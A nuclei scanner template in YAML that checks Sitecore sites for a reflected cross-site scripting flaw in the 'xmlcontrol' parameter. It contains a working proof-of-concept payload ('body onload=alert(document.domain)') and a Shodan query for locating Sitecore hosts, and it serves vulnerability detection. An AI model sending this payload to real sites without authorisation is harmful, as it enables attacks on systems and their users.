nuclei-templates/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml

38 lines
975 B
YAML
Raw Normal View History

2023-06-05 10:01:33 +00:00
id: sitecore-xml-xss
info:
name: SiteCore XML Control Script Insertion
author: DhiyaneshDK
severity: medium
description: |
Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack more can be achieved with these XML Controls
reference: |
- https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
- https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
metadata:
verified: "true"
2023-10-14 11:27:55 +00:00
max-request: 1
2023-06-05 10:01:33 +00:00
shodan-query: html:"Sitecore"
tags: xss,sitecore,cms
http:
- method: GET
path:
- "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<body onload=alert(document.domain) />"
2023-06-05 10:29:01 +00:00
- type: word
part: header
words:
- text/html
2023-06-05 10:01:33 +00:00
- type: status
status:
- 200